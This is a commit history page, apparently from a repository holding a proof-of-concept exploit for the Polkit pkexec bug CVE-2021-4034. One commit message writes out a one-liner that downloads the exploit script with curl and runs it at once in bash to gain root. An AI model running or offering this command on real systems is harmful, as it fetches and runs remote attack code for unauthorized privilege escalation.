Commit Graph

13 Commits

Author SHA1 Message Date
Davide Berardi
9ec3cff817 Shell prompt in readme example 2022-01-30 15:18:42 +01:00
Davide Berardi
a5375a7d35
Merge branch 'main' into patch-3 2022-01-30 15:15:04 +01:00
Adrian Lois
c26fb29c4e Update README.md 2022-01-29 20:15:10 +01:00
Harry Kurn
ffd4ca2c56
README: Use eval for one-liner commands
This will execute shell-scripts that are `curl`ed using current shell.

Fixes the pipe (stdin) problems, alternatively using `bash` or `zsh`
you can use process substitution. For example:

$ bash <(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)

Signed-off-by: Harry Kurn <alternate-se7en@pm.me>
2022-01-29 20:26:30 +07:00
Davide Berardi
6bb8d16985 One-liner closes stdin 2022-01-29 11:46:01 +01:00
Davide Berardi
e5cf2e41c3
Merge pull request #18 from berdav/pr-12-one-line-root
one line root with fixes
2022-01-29 11:37:17 +01:00
Davide Berardi
7c23bd118c Fixes for oneliner downloader 2022-01-29 10:30:06 +01:00
Nicholas Ferreira
465b0f35b2 One-liner root 2022-01-29 10:30:00 +01:00
Davide Berardi
89165e8be0 Dry run
The dry run execution will test if the bug is exploitable.
2022-01-28 17:59:23 +01:00
The Watcher
1e72090073
About Polkit pkexec (#11)
Add polkit description to Readme
2022-01-27 11:18:58 +01:00
Davide Berardi
87ebfb4d70 PoC in README 2022-01-26 10:29:48 +01:00
Davide Berardi
444257e5d9 CVE-2021-4034 2022-01-26 01:03:31 +01:00
Davide Berardi
1dabffa709
Initial commit 2022-01-26 00:51:38 +01:00